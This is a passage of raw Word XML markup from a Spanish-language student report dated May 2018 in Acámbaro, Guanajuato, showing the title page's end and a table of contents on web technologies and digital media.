          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2018</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="007A237E" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="007A237E" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="425"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>GENERACIÓN: 2017-2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="007A237E" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">ACÁMBARO, GUANAJUATO, </w:t>
      </w:r>
      <w:r w:rsidR="007A237E" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>MAYO</w:t>
      </w:r>
      <w:r w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2018</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F38E4" w:rsidRDefault="007F38E4"/>
    <w:p w:rsidR="007F38E4" w:rsidRPr="0035373E" w:rsidRDefault="00BF2EBF" w:rsidP="0035373E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035373E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CONTENIDO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D371F" w:rsidRDefault="002D371F" w:rsidP="002D371F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-1854031442"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00A70863" w:rsidRDefault="00A70863">
          <w:pPr>
            <w:pStyle w:val="TtulodeTDC"/>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="00A70863">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc514520836" w:history="1">
            <w:r w:rsidR="002D6D25" w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OBJETIVO</w:t>
            </w:r>
            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="1"/>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:instrText>HYPERLINK \l "_Toc514520837"</w:instrText>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:t>INTRODUCCIÓN</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGEREF _Toc514520837 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidRPr="0029163D">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520838" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CONTENIDO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520838 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520839" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Tecnologías Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520839 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520840" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lado servidor: Servidores</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520840 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520841" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lado servidor: Programación</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520841 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520842" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lado servidor: Gestores de Bases de Datos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520842 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520843" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lado cliente: Maquetado y Diseño</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520844" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nuevas tecnologías web (Tabla comparativa)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520845" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Medios digitales</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520846" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Imagen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520847" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Audio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="002D6D25" w:rsidRDefault="002D6D25">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-MX"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc514520848" w:history="1">
            <w:r w:rsidRPr="0029163D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Video</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc514520848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
